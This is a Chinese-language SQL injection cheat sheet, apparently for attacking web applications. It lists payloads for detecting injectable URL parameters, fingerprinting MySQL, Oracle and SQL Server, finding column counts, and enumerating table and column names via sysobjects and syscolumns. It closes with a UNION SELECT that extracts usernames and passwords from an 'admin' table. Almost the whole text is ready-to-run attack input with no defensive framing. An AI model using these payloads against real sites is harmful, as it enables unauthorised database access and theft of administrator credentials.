1判断网站是否是注入点
① :包含?*=变量名的 URL
Integer:
www.target.com/1.php?id=88 正常 www.target.com/1.php?id=88-0 同上 www.target.com/1.php?id=88-1 异常
String:
www.target.com/1.php?id=88 ‘And ‘a’=’a 正常 www.target.com/1.php?id=88 ‘And ‘a’=’b 异常 String
www.target.com/1.php?id=88 正常 www.target.com/1.php?id=88’%2b’ 同上 www.target.com/1.php?id=88’%2b’s 异常
2判断数据库是那种类型
数据库判断
MySQL
/*!%20s*/ 错误则是MySQL
/*!40000%20s*/ 错误则版本大于4.0 (大于4.0支持UNION注入)
/*!60000%20s*/ 正常则版本小于6.0
/*!50130%20s*/ 错误则版本是5.1.30
/*pc*/ //正常为MySQL
支持–pc,不支持; //Oracle
and exists(select @@version)– //正常为SQL Server
判断字段数
显示数据库信息字段数查找
id=1/**/Order/**/By/**/5/**/– 正常则字段数≥5
id=1/**/Order/**/By/**/6/**/– 错误则字段数<6
判断字段数据类型
id=1/**/union/**/all/**/select/**/NULL,NULL,NULL,NULL,NULL–
id=1/**/union/**/all/**/select/**/NULL,NULL,’test’,NULL,NULL–
正常说明第3字段为字符型可以显示SQL注入数据。
显示数据库版本
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,NULL,@@version,NULL,NULL–
当前库名
and/**/1=2/**/union/**/all/**/select/**/NULL,db_name(),NULL,NULL,NULL from sysobjects–
指定库表名
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from库名..sysobjects where xtype=’u’ and name not in(select top 0 name from 库名..sysobjects where xtype=’u’)),NULL,NULL,NULL from sysobjects–
当前库查询表名
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype=’u’ and name not in(select top 0 name from sysobjects where xtype=’u’)),NULL,NULL,NULL from sysobjects–
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype=’u’ and name not in(select top 1 name from sysobjects where xtype=’u’)),NULL,NULL,NULL from sysobjects–
字段名
从0开始增加第二个top N的数字就可以遍历admin表的字段名了
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name=’admin’) and name not in (select top 1 name from syscolumns where id in (select id from sysobjects where name=’admin’))),NULL,NULL,NULL from sysobjects–
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name=’admin’) and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name=’admin’))),NULL,NULL,NULL from sysobjects–
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name=’admin’) and name not in (select top 3 name from syscolumns where id in (select id from sysobjects where name=’admin’))),NULL,NULL,NULL from sysobjects–
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name=’admin’) and name not in (select top 4 name from syscolumns where id in (select id from sysobjects where name=’admin’))),NULL,NULL,NULL from sysobjects–
字段值
id=1 and 1=2 union all select id,username,password,NULL,NULL from admin–